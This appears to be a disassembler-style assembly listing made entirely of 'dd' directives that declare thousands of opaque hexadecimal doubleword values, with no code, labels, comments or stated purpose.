dd 56B01359h, 72781079h, 69F289ACh, 11C3C38h, 7C0B8464h
dd 12FFD3C5h, 0CD3C48C1h, 131862E8h, 83C2572Ah, 7F549D6Bh
dd 0E65C8CE0h, 0BB2EC895h, 0DC071738h, 31FE7738h, 6D77D6DFh
dd 0D200B8E7h, 0F10131DDh, 0CC68BBB0h, 0D735A6BBh, 0F6E0A7BAh
dd 0F5E5ADDCh, 2C12DC67h, 0E9DBB803h, 13370B68h, 50F25587h
dd 0D364E358h, 7E185A67h, 61C00F70h, 0B4FF2365h, 0CD5849B4h
dd 5DBD7E45h, 3152FFF0h, 50D8A377h, 0D47961AAh, 0BF577E08h
dd 0E7E5B14Fh, 0E81803F2h, 0AB7128B7h, 0F7131070h, 496C8A8Dh
dd 0EB8302B4h, 40C3823Fh, 0D66CB679h, 0F34C2D06h, 43870FCEh
dd 5455BDF0h, 6D1D1557h, 8FEF3AC5h, 55CF5A48h, 9C877EB8h
dd 1FB60BE7h, 709BE221h, 0D037B596h, 9D2ED2A4h, 0D5FD1D2Ch
dd 87E316A5h, 880A27A3h, 55C2E2FCh, 0CB87B08Ah, 73C5A673h
dd 0F539CAAh, 251C60BEh, 9FC1B17h, 0C9B0261h, 0C90B639h
dd 2BEA3B07h, 0DB3ABCCDh, 4BDF2502h, 1C178360h, 1B09E595h
dd 2B1B07DBh, 54D5DFD7h, 0FDA40599h, 0ED1218B3h, 0F240E6D5h
dd 7E6B6F1Ch
dd 3F4FA855h, 9A88381Eh, 1A73C195h, 0F5E72E23h, 5BD6C75Eh
dd 290A2FC0h, 0B825C99Ch, 0F9E5A57Fh, 0DC86F95Ch, 8DBACEC0h
dd 56880BA3h, 0ADDBC0F8h, 5050EC49h, 211D97ADh, 5F1F8774h
dd 50C7CE33h, 0CFE27405h, 33FCED81h, 280E67F5h, 0D1209855h
dd 0ED9434C7h, 0D0DAEDB2h, 5FC10731h, 9B0F092Bh, 2460CE63h
dd 0AC1CA3CFh, 68B9AB11h, 0FEAFB5Fh, 0E3DE7B74h, 0E260B2B1h
dd 84AA9B90h, 7C4ECF40h, 0D662E5B0h, 644F803Ch, 0E4A818BAh
dd 0BD15F109h, 0AECCA056h, 68D31F2Fh, 0AD12E751h, 5D38D7A8h
dd 9CC6C656h, 0B169F4ECh, 2D83A817h, 0A8A21949h, 0A7A8A2B1h
dd 944C59B0h, 5B713656h, 778EEF77h, 204AA887h, 8A402E59h
dd 0D148D72Dh, 0A84B355Ah, 0AA69C25Ch, 90DD621Fh, 3B463B20h
dd 13BFEFD5h, 4CBA896h, 39E05B50h, 695AD8F5h, 0C17749C6h
dd 0FD2E788Fh, 0D4B05A82h, 1E571684h, 0C4413A6Fh, 2C2610ADh
dd 0CF9DC0D0h, 0D611356Eh, 836F0F9Eh, 0FC2A3AEh, 4B5D1A51h
dd 0A1BAF56Eh, 0BF492473h, 7F3AAB96h, 6081C656h, 787056B9h
dd 58D3EA74h, 9C0FF3BAh, 40D95B99h, 7122EF2Dh, 0EC4B511Bh
dd 565CB68Ah, 4E221F36h, 83132E96h, 0DA00CE27h, 0AB3DDAF8h
dd 5C26C38Dh, 54FE0911h, 3EE8A14Ah, 0F3C7E570h, 7E0E2EFFh
dd 18AF99CDh, 2A56C8B7h, 0F9232733h, 0C08A646Ch, 181F71BFh
dd 9580D2FCh, 6E6A1423h, 19DD782h, 0D1DEE557h, 5D176735h
dd 2BEF095Ch, 68D6A155h, 688F5687h, 0F16BE787h, 434688Ch
dd 38AC1C1Eh, 6F3B633Bh, 9D8997E4h, 0A1A7BF2Dh, 194FA92Eh
dd 9D308885h, 2E59A5A3h, 497B5AD1h, 35F44C5Ch, 25BDADB0h
dd 5CB06AF6h, 56885163h, 0F5E36BAAh, 89F6B7BEh, 68DF562Dh
dd 62A85EFCh, 5F2B797Bh, 0F605A33h, 4A8BDD2Ch, 14C55D14h
dd 0C98CB062h, 63A51111h, 0E93D2509h, 2F35BD5Dh, 68EF902Bh
dd 7CA9436Dh, 0C715D23h, 0FBE5F58h, 0C593B6ECh, 0D769C6h
dd 87E189FCh, 4813591Dh, 1949F570h, 167D759Ch, 2374F866h
dd 3D087D44h, 70D2511Bh, 236129CCh, 3CCEB73Ah, 0BF9EDAA8h
dd 0D6257930h, 4CF807CFh, 58E0EEC4h, 22440D3Ah, 0D0A59B4Ch
dd 0D204B750h, 0EAD2FE94h, 0C1682FDBh, 853B2968h, 57C9F7D0h
dd 0B6696FF6h, 0A9A1CAFBh, 7E0A0252h, 2CFB5A8h, 69024D97h
dd 0AA2CBACCh, 0CD80A735h, 0DAE25F14h, 637CAC4Eh, 0B7F3144Ah
dd 0A2FFC09Eh, 0DA97B61Ah, 0E72D0BEEh, 2B09C4A8h, 670D1345h
dd 1F70DD66h, 8376FB29h, 69344947h, 0F704D83h, 0BB6D93DBh
dd 0A987A0BBh, 30855EE9h, 0ED4CE2A5h, 89F4474h, 411E6BADh
dd 81366E38h, 91F2A3D4h, 0B114CFF9h, 0BE99EFDh, 2C8453B8h
dd 0FADD4507h, 2A02C82Bh, 1FA3150Bh, 0E5BBA03Eh, 0B00DF700h
dd 0E0FE6ABFh, 0C0B76ED8h, 29BFE6Eh, 1A7A73AAh, 0BED526E0h
dd 0B38E1AF4h, 83F5B765h, 7E8FD90Dh, 0A86B70E4h, 99F5262Fh
dd 9DC013ACh, 7872C256h, 3EA2A860h, 0BFB5F2Dh, 0B881A779h
dd 173A945Ah, 0FCFA02AFh, 2605381Eh, 0C2A2342Bh, 0AD119C6Eh
dd 6F1E2356h, 15FD18E5h, 9E2C5E57h, 1F9CACC4h, 1BB4A796h
dd 0DA8D089Eh, 0E1E58073h, 0CC0623E5h, 0F881381Fh, 8168B7D6h
dd 0F9BBAE33h, 78FF457h, 9483CD57h, 0F7351CC0h, 0FF51DE68h
dd 435FE084h, 0E0B377A0h, 0C1F0B262h, 964201B5h, 4AFD204Dh
dd 83F5143Eh, 6AD45D43h, 0E95AA583h, 2CADAF3Eh, 7BF232F7h
dd 379F4816h, 3F8E687Eh, 1BF57317h, 228C60E6h, 16A44755h
dd 282565C6h, 0CAC59987h, 0ABFCB62Fh, 0ABBCA62Eh, 6F865A0Dh
dd 0B3CB6A5h, 72239AD1h, 0D5AFE76Ah, 0C9074671h, 0CBB993C8h
dd 300AA5F0h, 52E8A4C7h, 7EFAC7D7h, 2EA21816h, 0C397181Fh
dd 0CDE8DAEh, 0F853F4E7h, 43AC61A5h, 0EF3358CCh, 5639113Ch
dd 485BA16Bh, 0FFEA2E93h, 6013A007h, 7A18D709h, 0AC396726h
dd 7F04E2CCh, 49F48FB9h, 7D3E3BE5h, 8D5B91FCh, 7D4B0AA5h
dd 0A898CA58h, 5F2B04D6h, 0C10550C7h, 40A7E2B6h, 1ACFEDE6h
dd 44B625E1h, 6D12AC25h, 5A4F9D6h, 0E5927C5Dh, 84AD1238h
dd 0B0E112D3h, 0FC673F56h, 0BCC60AC0h, 7B927528h, 0CC726669h
dd 291FE5D6h, 35B6210Ah, 0DC5C9B7Ah, 587B09C3h, 89823957h
dd 8E53D229h, 0A22BF617h, 0DE3DB3F5h, 0F285765Eh, 2E5C66B6h
dd 0E8AA38C6h, 437BC1C8h, 4B54D7FEh, 4FAF972Eh, 69C25E0Dh
dd 0ACEE6777h, 6857A75Fh, 712AD5AEh, 5C2B266Ah, 4FF48E88h
dd 0A261F824h, 54F7B74h, 40B1FDD4h, 71A03A17h, 76E35EB1h
dd 0A7324DB9h, 930A6A5Dh, 2E46B812h, 7D706221h, 518CE00Bh
dd 259B1448h, 6A01093Eh, 0A03B5FBBh, 59FD56C2h, 0F9E313FDh
dd 2D27BF0h, 0F5135221h, 1D025E9Dh, 9F48CD26h, 3C58F888h
dd 0DE2F3B38h, 2E2DF066h, 4BC35857h, 43EF8C61h, 44EF97DBh
dd 6EBDC6B7h, 5530A4DCh, 0DD038E99h, 3DD8E62Fh, 85062E10h
dd 0E75D6707h, 55955204h, 0EB092C7Bh, 0F2D3CA0Ch, 0D90A532Fh
dd 0D0535B28h, 83D68672h, 312895CEh, 6C2D0226h, 0C8BD7E61h
dd 9C06E703h, 0DBF9F439h, 5759D82Ch, 42A0DB6Bh, 0AD0A95BBh
dd 3B93E354h, 0B4F1997h, 0B889F462h, 0BA508B35h, 7671676Ah
dd 0C9256BB4h, 38D8AAD0h, 0A1F1BDBCh, 585F9E17h, 3ADEE201h
dd 8BEBD1E3h, 554B481h, 146ED7C6h, 8FBFF204h, 74F372F0h
dd 0AD284C07h, 0F67F2044h, 729F906Ah, 0F188E31h, 2A6E9CCFh
dd 0CA41F4D5h, 0C5EF035Dh, 1019AA0Fh, 68578536h, 25161FBDh
dd 93222333h, 1AC99B0Dh, 2B40C030h, 6D523060h, 0D8A4A859h
dd 992FCB25h, 0F62DE369h, 5617C5C8h, 0AE1B8B69h, 15AE26EDh
dd 39ED80C5h, 50C79C0Ah, 2A2ABDE6h, 46439D85h, 96741D0Fh
dd 0D960CDF2h, 7450D54Bh, 2B6B4694h, 0E279B458h, 0AE6E7225h
dd 8ACC89AEh, 0B01C9129h, 332A2D05h, 0A814C6C9h, 8383E5Ch
dd 0C8516F9Ah, 27A4BBE3h, 0A0C07894h, 0ABC6A621h, 7EF7847Ch
dd 6FED09C7h, 99E37D54h, 783703FEh, 0DBAD927h, 0CF8A922Fh
dd 73BD1AFh, 44565F67h, 0CF44EAB4h, 0B558B368h, 5BA5B5FFh
dd 42A830DEh, 915EDEE7h, 54A5D623h, 6EC5A5ABh, 0C5014020h
dd 0C2395436h, 0ECE0CFB7h, 32201D52h, 2F58CD29h, 6DB9F933h
dd 1C758CEAh, 0EF896D8h, 9F6B5A15h, 206F38D9h, 51A1A3CDh
dd 0F1D04F1h, 9950F89Ah, 711EA1C9h, 7ED6A994h, 0DFA7ADADh
dd 38FCB238h, 0E9002913h, 0AEC40154h, 356BABC1h, 0EDE8FE33h
dd 4D5F13FBh, 59DA62FBh, 0EF003B2Ch, 73134832h, 68ED57FAh
dd 5123B8E1h, 348A33E0h, 940A7450h, 560D3822h, 6C06B515h
dd 36A9CD3Fh, 6B41B13Eh, 52C4B1F2h, 0B354DDA5h, 852FAB4Fh
dd 0B75E166Bh, 0F07C640Dh, 40730BCFh, 0EFA6E6A9h, 0EC597204h
dd 0D87775E8h, 499F10BEh, 74C83E70h, 790EF631h, 5C35C31h
dd 0B33A37D5h, 234FB143h, 55CA148h, 0F945DA6Ch, 648EF166h
dd 95706539h, 0F58505D8h, 3FA7292Fh, 0C35D2C5Ah, 4195398Bh
dd 0F90E1D20h, 0EC4CCEC4h, 0F1314F51h, 0E5CB4703h, 9B198A8Dh
dd 0BFA6F26Dh, 0BB3CFFC0h, 943DB32Bh, 2EF64946h, 0ED4E3972h
dd 0FB27E364h, 28520126h, 0D34ED5h, 0E0788470h, 256E2394h
dd 7E84D4ADh, 759CD8B9h, 8500ACF9h, 0AB808A06h, 0EDE618ADh
dd 0BC4FA380h, 8156541Dh, 0DFEB8044h, 0CE72B16Bh, 0A57D03EFh
dd 369B37C7h, 931487EDh, 0D694CB66h, 6D12A34h, 50B46915h
dd 0C12944E0h, 0B3E5ABB5h, 0ED90D552h, 0DD09CE51h, 0FB701BDAh
dd 45A3FE9Eh, 53E97C88h
dd 6055A781h, 480AA899h, 54A2AC38h, 0E8A20E1Ah, 0A29ED96Ch
dd 5AD14B48h, 3F571C45h, 0D5A869DEh, 59CA25ECh, 0CB5DB343h
dd 86ACB62Fh, 73D006EAh, 0DD9A1577h, 0EF0815B4h, 1634508Ah
dd 5BA6A262h, 2E853B1Eh, 1E5954B1h, 0C2BE8621h, 0A0BB24E8h
dd 89E18537h, 2AADF196h, 68BA10E2h, 0BA9F849Dh, 24091E04h
dd 0E720DACEh, 79530206h, 0B81CC0F8h, 787BAC37h, 8F4F6A66h
dd 0C2FBEB3Dh, 5D144D6Dh, 0D2FA50CEh, 12CD3F0Eh, 365A58F5h
dd 0EAAB9423h, 0A5A0D191h, 0D3EBC80Ch, 713E77BFh, 3D26BACh
dd 0DFC3092Fh, 2047D59Eh, 48F587E3h, 77AA56ECh, 5368C005h
dd 240F9157h, 0BA4D929Eh, 0ECD99C03h, 95EE8B9Ch, 1CD5A423h
dd 1E15F63Bh, 0FCCF22F8h, 3E4FE28Fh, 2D7543F1h, 0F81E0A86h
dd 6BF08A7Dh, 728B73BFh, 0DAA616D7h, 0AE150A92h, 3CFADEE2h
dd 8AAD93DCh, 0A847E52Bh, 9BEFB09Ch, 5C6F38A5h, 39C1C27Eh
dd 1F34F682h, 2A2CE046h, 0A2CB82DCh, 0B6C5F7E0h, 0D2AD7F7Dh
dd 0A2A1A1E9h, 8A5473h, 0A005262Ah, 1B1F5940h, 0E680694Ah
dd 2C4E8587h, 607E2554h, 0B1683426h, 4EF66429h, 0A6860A25h
dd 3EF879D2h, 0C42D5578h, 85A3381Eh, 0DCF93C3Ah, 43AB9529h
dd 0E8D51561h, 0BD67DFCDh, 2E4E6092h, 0F145CA84h, 17699BC1h
dd 625FCA72h, 456B0BADh, 0CC361E8Fh, 978C3FCBh, 4A7B29F2h
dd 0E284061Eh, 0FFC1B366h, 0A708FD6h, 0B972F742h, 0EB2FA160h
dd 5FE5A6C8h, 62E2CE37h, 0ADE0DCD4h, 5DDB4ADBh, 0C4E4C7AEh
dd 669FD1ECh, 2DF67A2Fh, 3D25A319h, 0D95BAD2Fh, 5B81B18Eh
dd 976C41DCh, 0C88587EBh, 7EF0DD2Bh, 77E61287h, 5895034Ch
dd 0C0CFAE0Ch, 0C34DDB9Ch, 0AED8F30Ah, 2CE038C5h, 0E72E54D7h
dd 0A39939F9h, 0CF1D9095h, 0F7EFF8DFh, 0CD3BA08h, 0BF4DD582h
dd 92E8D88Fh, 9B94D336h, 7F555D84h, 5D4EFD9Bh, 0EED0EA4Bh
dd 6805729Ah, 22B6025Ah, 0B9F1382Ch, 2D8010A0h, 0D817129Ch
dd 0D00A2572h, 894A2169h, 0BF41FB29h, 0A6327ED3h, 3F951DDDh
dd 409471Ah, 210F25C9h, 0AE2C1D56h, 7626F7C2h, 0C6C1D7C9h
dd 0D5D8075Bh, 15586A50h, 35A24FA5h, 82DD7E23h, 0A109599Eh
dd 0B2BD3960h, 34EC5E60h, 0B4FC987Eh, 72FE55Bh, 659D75A1h
dd 65DAE1ABh, 54F2AFDAh, 0C6873FD3h, 916B6F72h, 482AE16h
dd 5303B8A3h, 0CE3E8724h, 4E84F2EDh, 87431B94h, 69AE63Dh
dd 71B1ED2Ah, 0B4573583h, 0B2F27298h, 0CA09EECBh, 0D977B31h
dd 530C1F4Eh, 0C704F108h, 1385FBF9h, 0A9D60D30h, 0BF1F214h
dd 0D9B9156Bh, 0C7DEE81Dh, 0A445FC36h, 96CD8295h, 0DA320FEFh
dd 9ECE52ABh, 0FBFB945Ah, 6921BF81h, 6225E9F0h, 0A5AF7FFCh
dd 57EF8D5Fh, 8603B686h, 1DC801D8h, 0A5BF1737h, 84843CB7h
dd 1D12171Bh, 0DEA7E7FBh, 2C90F340h, 0AD8BE4Dh, 0B1976D18h
dd 7880B000h, 9636C7FDh, 8EA15B5Eh, 35199973h, 0D47303F9h
dd 8A8D4498h, 9CC54B48h, 545429FEh, 0CEBB90EBh, 0CEC0A56Bh
dd 0F29C173Fh, 345CFAF5h, 51212763h, 0EF40A88Fh, 0D930F878h
dd 99A8A18h, 0B9507ABFh, 53CBFEB6h, 0A2A7BD37h, 6913A718h
dd 0CF72129Fh, 4A796A1Dh, 4D87A4DCh, 0B0E14018h, 0F9346B1Ah
dd 30E3CAE0h, 58455790h, 51C8F431h, 0E869DA00h, 3D64C2FEh
dd 50489FE9h, 5B0A2E27h, 7E2810E7h, 0FEFFE754h, 0EB8C5C01h
dd 19546128h, 36B7E8AFh, 2ADD8B82h, 95E1EEFDh, 3A590B09h
dd 0EEDAA2Bh, 20BF5D17h, 60566D00h, 87BCBFEAh, 10B1528Ah
dd 2CC227E4h, 0EFE22F7Eh, 5B05C8E4h, 0B8310834h, 14316ABCh
dd 0C7676D30h, 1ABDA285h, 0CC60B92Eh, 0AE209991h, 0FBD640D7h
dd 0F02530Ah, 476088B0h, 1832EE6Fh, 0B03FB950h, 0F7348143h
dd 75B899DFh, 7C074C29h, 787EE81Fh, 0FCEE6DB8h, 0D17C2A98h
dd 4D1A7078h, 5595094Bh, 7E4B2591h, 0D10E6DD4h, 0CCD12B4Ah
dd 6717B3A9h, 7DEDD815h, 56F45584h, 0F6254F9Eh, 3C25988Eh
dd 747B5C1Eh, 5E95AB6Fh, 8D358752h, 0A455B6FBh, 0BB956F81h
dd 0F7708D7Bh, 0F899C0F2h, 8E47B25Eh, 0AFDCD237h, 5BCA388Ch
dd 743F0A38h, 303E9006h, 9AE94970h, 0C57FAF6Ch, 890B6A81h
dd 39AD0F88h, 0A9E88A6Bh, 0F55CE269h, 0CFE2D9A3h, 0C70F57h
dd 504CB061h, 17FE5B6h, 7E3DD5D9h, 8ECD6E70h, 0B5C7968Ah
dd 303CA31Bh, 3CECC3C6h, 70189B81h, 0E872C40Dh, 991281F9h
dd 5F450247h, 38E0015Ah, 0AB6006DBh, 9DB7CB01h, 56267818h
dd 408B7E94h, 28C5BE25h, 0FE9332BFh, 81DF47C4h, 0B1DA4039h
dd 46DCD940h, 0F5F07A8Dh, 7ED42FB0h, 30A515D2h, 46F2093Ch
dd 0E52C846Fh, 0FF85C7E7h, 38B8821Ch, 0E654D8D2h, 0AC0870D7h
dd 62ED3B80h, 402CA7F3h, 422398D5h, 8949E646h, 0F29CEEFCh
dd 897A9ABh, 7897E155h, 0A45A62EBh, 0DFFEC9BBh, 0B229D1EEh
dd 4FFDB0EAh, 0F6090C14h, 3AD147E9h, 0C3BADE37h, 19FA56B3h
dd 7D1E8EE0h, 0B05DFDEh, 1DF3AF37h, 0DC4CB5DBh, 0C6A2D9B8h
dd 9180F83Ah, 0DB38AA29h, 0FC72184h, 0E11375ACh, 2688D992h
dd 0E5CB7C0Fh, 0C4C17397h, 9D49F57Fh, 0D0D3708Bh, 0E5AF92D6h
dd 0C4283FA4h, 3C9339CBh, 0BF121BB0h, 3D55E558h, 58669144h
dd 0CD38A290h, 0AC4B21D3h, 8F17B6E7h, 1A18463Fh, 0ED9A8256h
dd 8AF6C446h, 0FEFB12FCh, 4B1B4F75h, 8CABF020h, 0BD94E522h
dd 4AAD6E11h, 45AE4968h, 296F68CFh, 57BB9017h, 197F6858h
dd 0A5293A7Dh, 819F8286h, 710B6303h, 75E5BEFBh, 74C185EDh
dd 0BE9A5A2Fh, 8B966790h, 494404CEh, 300CD270h, 0D6FEE5h
dd 0AF359A37h, 0D4AE09D6h, 84D129B6h, 0B740875Dh, 5F9BDA3Ah
dd 54D5CBFDh, 9669AC59h, 84D1FA82h, 870FFC5Fh, 630A6603h
dd 966EC073h, 0A267394Bh, 87D767A8h, 0AE4A6DCBh, 5BF0B7C6h
dd 657E83D0h, 1C9F805h, 9B1120F1h, 0F0A72C23h, 3D159D58h
dd 6FEEEEA3h, 73EA938Bh, 8957F57Fh, 15B15E3Ah, 8E824E87h
dd 0E6AE5262h, 56B20A94h, 236D4705h, 0FED09487h, 0AD2EF677h
dd 0FF576CB3h, 0CB8061EAh, 9987E10Ah, 52298AFh, 0E96B1B09h
dd 3B46D770h, 3CCEB6B5h, 3C381A0Dh, 0C67356F8h, 0D0CAE607h
dd 55A997ADh, 9291E3BFh, 9787637Eh, 60E9F827h, 6B367FA9h
dd 25C7C973h, 49D7837Ah, 0A96CD4C2h, 0AF68A379h, 6D774F0Ah
dd 0D39FC153h, 0D0BF0592h, 0AA747739h, 6D1744AAh, 8F37D33Dh
dd 9DEF925Fh, 0C582E956h, 676B2299h, 78E5FA6h, 0C668ED17h
dd 90F3A0F2h, 0D88AE7C5h, 0A026ACA2h, 0CB2A1627h, 0F27F39B9h
dd 40570AE5h, 52288DC8h, 0E5F7557Fh, 9D2D96D7h, 6FD58165h
dd 31B8EB66h, 0E4B99758h, 0D05A7C13h, 4F54646Bh, 66507915h
dd 0A3D5C1AEh, 5BF71DD3h, 0FC8D81E3h, 7101BFDBh, 94D463C3h
dd 84545271h, 5AA50F2Dh, 4E70A70h, 198417E4h, 1F8C7C8Fh
dd 9EBB7DA8h, 881B0340h, 532A5A16h, 0F0AF123h, 0DFA099DEh
dd 3380307Ch, 8162DD0Bh, 213C5DA0h, 9BB2E0EAh, 48A39B47h
dd 91FCF3A2h, 9CC30A0Eh, 0C4C0094Fh, 0E9A05B20h, 6570D50Ah
dd 73266AF1h, 0D03EFC44h, 8F1FBE6Eh, 5ED8C707h, 8E2C0498h
dd 2D0A0821h, 289DBC5h, 0E07E04AEh, 7783D1C8h, 0C4F9DD6Dh
dd 79DF5B0Fh, 1F88AB4Ah, 0C36B0BACh, 467A3600h, 0FB6A38D0h
dd 85CEA011h, 8F21D294h, 7EB29D7Dh, 906DFh, 52445FDh, 669285D8h
dd 55AD1F4Dh, 9892960h, 947B147Ah, 30ACE381h, 0A78A3C3Ch
dd 85AA9BCDh, 23EDB4F0h, 3E8E051Ah, 0B650EC97h, 29162F90h
dd 0F69EACD6h
dd 0A0806D20h, 0C5C262E9h, 0A2AE0933h, 5C0C5D6Ah, 0B57AFF4Ah
dd 0BB9AEAD2h, 0B28AF205h, 0E8E40224h, 3AAC9168h, 7EF7176h
dd 0BAD4817Fh, 4AFA8538h, 0E422773Fh, 0B82A818Dh, 833EBB4Bh
dd 0D359086h, 280C52C8h, 3AEE1331h, 0F3014971h, 58E96963h
dd 0A113385Ah, 0C0F6F95Dh, 5EEF3B76h, 66C9E3B2h, 0C20184BFh
dd 45DEC7B8h, 595C16E0h, 744E6A4Eh, 62361485h, 0EC5137A4h
dd 3C0C42FCh, 749E9957h, 1242097Ah, 45F0797Eh, 2560B890h
dd 3C1D5CDAh, 0D0F84E2Eh, 0CB2C01C5h, 0C0F231ECh, 8C2B3E41h
dd 0B811459Dh, 9EF07BD6h, 0ED0F492Bh, 0A16916F1h, 3F17CE0Ch
dd 28DD06FEh, 0E36EA66Bh, 0EAC0AD68h, 2A387130h, 8E7920EEh
dd 1F7D1E55h, 356D21EAh, 3D139F6Fh, 92DCA6CEh, 0B1690B90h
dd 1462C021h, 0E890EEB0h, 25DD145Ch, 4796F476h, 0EE3CB9ABh
dd 0A23ADB8Ch, 2CDD2879h, 25913830h, 0F550778Bh, 0E32368C9h
dd 0CE6EEC87h, 95C51726h, 3E9CD2B2h, 0E02F8925h, 40A6654h
dd 72F27F04h, 0D0F5E3B1h, 44335AE2h, 0DF7E88A2h, 3BD02F46h
dd 0F98120ADh, 0B9263862h, 313F578h, 0CADCB79Ch, 369B3D1Eh
dd 4141AF1Fh, 5FBAACA1h, 0C0FAC506h, 7B180B5Bh, 0F3D1F8F2h
dd 55934C78h, 6C37292h, 0C1478BA7h, 532CDF5Eh, 2A4F8E14h
dd 7F7ED0EEh, 0FB81E57Ah, 0D895776Ah, 0DBD56CBh, 84643F28h
dd 0BE57BB0Ah, 4C042A0h, 0CA6B808Bh, 2E0405B6h, 18961797h
dd 0B5A164A6h, 0CEAA41DCh, 0D273378Eh, 0E2766B54h, 37652C92h
dd 2BA1C9B0h, 0C90B2CE0h, 4E91E135h, 0FC6C882Fh, 8B635D44h
dd 861A1561h, 57229075h, 8303A93Bh, 6B206AD4h, 0DF08D5F5h
dd 0DB0FF4F8h, 0FF28434Ch, 632618B9h, 4FFBDF37h, 0CC2DCE76h
dd 8F36A577h, 0D048DADh, 297C4BEDh, 3CB159F4h, 0AB3CD56Eh
dd 0D705653h, 0D0BF1F04h, 2AC99484h, 0BEFB0311h, 2B45A183h
dd 0CF051543h, 97B68C18h, 0E1422910h, 4D1ED3C1h, 0CC5D9444h
dd 74D9594Ch, 2865BB53h, 1053C444h, 898E71D5h, 0F3B3027Ah
dd 9526A867h, 36233315h, 80E2C95Dh, 0CCC74F7Dh, 0BFECD9A5h
dd 60333E7Dh, 0D9F1C807h, 9AEEB065h, 95E42F39h, 7E29BB9Bh
dd 0D80FCCE4h, 0D31494DAh, 8B43D1EFh, 638A5B1Eh, 0BC001DE8h
dd 9294C96Eh, 5A94AFAEh, 7F2845D9h, 995E52A1h, 9F287E27h
dd 0D9430708h, 0B5D1DABDh, 0EB80A7F8h, 360136D7h, 6B3BC73Dh
dd 21B15E36h, 0FCA3B5Eh, 0B9D0F88Ch, 2ED7B989h, 9558CFDAh
dd 0E81F5A28h, 12E9A035h, 0CDC5B962h, 568F1818h, 1A9CEF59h
dd 68F7D5EDh, 0A50D149Eh, 0A0B8D6Bh, 3D87E503h, 7CD49F7Eh
dd 0D9244129h, 4435B559h, 0C0A51ED1h, 956C65F3h, 0C00310D5h
dd 0B8C2F86h, 0B470271h, 1AD1E77Bh, 0B5E6929Fh, 4AFC32F0h
dd 0BE28F7E0h, 31B8EC1Fh, 1D5EBADEh, 6D1BBE3Eh, 0E09383B8h
dd 0E07E6B24h, 0E2FD483h, 91C1DA9h, 0EE1152A1h, 692C0D5Bh
dd 39192A24h, 3B409AB1h, 6D1DC637h, 15224ED5h, 2A8A3CDDh
dd 0E9394DDCh, 7F7D0391h, 4717C6A2h, 6697BF3Bh, 533E64BCh
dd 7C2BD55Ch, 64A10CCh, 0FE448EDFh, 3313B681h, 0DDCD240Fh
dd 723BFC16h, 89954044h, 53A29750h, 27F31FD3h, 56AD4504h
dd 0CB4851DDh, 588ED72Dh, 0DCA570Dh, 83C7FDFEh, 2F9969A7h
dd 35DCACCh, 0F34E884Bh, 0A6C887E3h, 7B38B650h, 8339640Eh
dd 77CB47EAh, 0D41A9FDAh, 2861FE33h, 74096EF8h, 0A8CCE7F1h
dd 36B12545h, 2EA62D2Ah, 81C6004Ah, 5311F92Eh, 0F3C32CA1h
dd 91A5991Bh, 37537172h, 673DECDEh, 41B4ED96h, 7BC150B4h
dd 7F80373Ch, 2C5724CBh, 0CBA35225h, 0B5C19B47h, 0DBEB37F7h
dd 0A1ABCE96h, 6625F5C0h, 0E6FBE841h, 0DB54CA73h, 613B814Dh
dd 62F89456h, 0AD05718h, 73EA295Fh, 69FE77D7h, 0F17CBFC6h
dd 0F35DEB6Dh, 0F452B0C5h, 58D45D60h, 606ABCB3h, 0A3D498BAh
dd 64666B97h, 19C369E8h, 9647C03h, 87130AD8h, 0ED92962Fh
dd 1C8F6FD2h, 9A18548Dh, 0B05FEE37h, 0B2FB3EA3h, 0E7FDA570h
dd 0C0C7E1AFh, 0DA6E4CCEh, 388A3496h, 7460A2B1h, 0E54B218Bh
dd 4196BD7Dh, 0A4B57B8Fh, 625B6643h, 0F57800Ch, 0C866787Eh
dd 6573955h, 0A2E51E9Bh, 1BFB71CDh, 5A369DC6h, 5FF1EEF0h
dd 957BBDEFh, 228765Bh, 0E606D91Fh, 0C54BCD71h, 5987C09Ch
dd 7D2BE440h, 0A19DEEB8h, 626381D2h, 0AADEE5A0h, 0D9393F7Eh
dd 0EC80D7B9h, 0DC0A1D40h, 0CFD5EAACh, 7E85FE07h, 0EAA6E142h
dd 14DAF9F3h, 70841D63h, 2F8B579Bh, 8529C390h, 66E2A153h
dd 0A541A1CCh, 888C493Fh, 54ADAA76h, 77CBEF7Dh, 6D5E079h
dd 5158F777h, 0B37A4927h, 36B5BCD4h, 71D625ECh, 8AD02AA7h
dd 0B109AB29h, 0F1A85DAAh, 0D36168B6h, 78805807h, 0BAF6B83Ch
dd 0C514BA4Ah, 203E7D53h, 94E2B027h, 10B91546h, 0E2AA53ADh
dd 0F32B8FDEh, 17FB89E6h, 564F3090h, 75787D3Eh, 6970C818h
dd 7CDC950Eh, 1947ECEDh, 410232BCh, 0D5CAAD9Ah, 0DACE53B0h
dd 6487E3B9h, 0A5FE07C3h, 56617B2Ah, 0B8053079h, 0B352FE05h
dd 25E7C626h, 29FE5012h, 11AF5736h, 7E236DF8h, 516250D8h
dd 71C6B13Ch, 0FBC5E5B5h, 4B7E9AF3h, 5F87FE71h, 0FEDD5B32h
dd 0D4AEA58Eh, 5F91A76Fh, 489C47F5h, 4C7EC2CAh, 0FF63737Bh
dd 46F0F12h, 75B659FEh, 0BFDF6E1h, 55E3131Ah, 0BE06A570h
dd 2B3BDBD5h, 0F094E240h, 36D29843h, 0B42F976Ah, 67C6DEDAh
dd 0A5F9B8EAh, 8A85C71Ah, 9D33FD09h, 39D15AD1h, 3EAEE6C9h
dd 0A7437C70h, 21F837DBh, 0FD44769Eh, 0FCAD6835h, 907C5B1Fh
dd 0D9329144h, 8BF0C1A3h, 0CE05BED6h, 5B8FA7B1h, 8940294Bh
dd 50C0E674h, 0C59D5B6h, 1DD1A7C1h, 0D5ECD10Ch, 0AC4CCCFAh
dd 8D295F09h, 2B75F969h, 0D6966303h, 9266DD28h, 0ABC87ACAh
dd 0C5C67F08h, 0E8BC4D23h, 0A002703Eh, 0F2BE6A74h, 2C3C62AEh
dd 0D689305Ch, 793138D2h, 66DD67D9h, 24B2211Bh, 0D6B1B4Dh
dd 12B2A51Bh, 1FDAE36Ah, 80897B0Ah, 2C372B78h, 0B9F1A4BDh
dd 0C6922FD9h, 379BAFF0h, 9FB9BE8h, 74C8A875h, 28D68171h
dd 937C0FFDh, 0D32AA42Bh, 2CF8C5BDh, 0E072BFEDh, 4C11EA8Ah
dd 7FC40AD5h, 66D537D1h, 8BFD4038h, 0A37C7256h, 4DA43A65h
dd 1B2815BFh, 0C62373ECh, 554A5A9Fh, 0ABF0552Eh, 7D1BF697h
dd 1E9981F0h, 83E7EB45h, 38C5B8A0h, 0DC8AAA79h, 145248DBh
dd 0A797687Ch, 5A3EFF29h, 9C1F1F39h, 44D9BFA8h, 0BD699991h
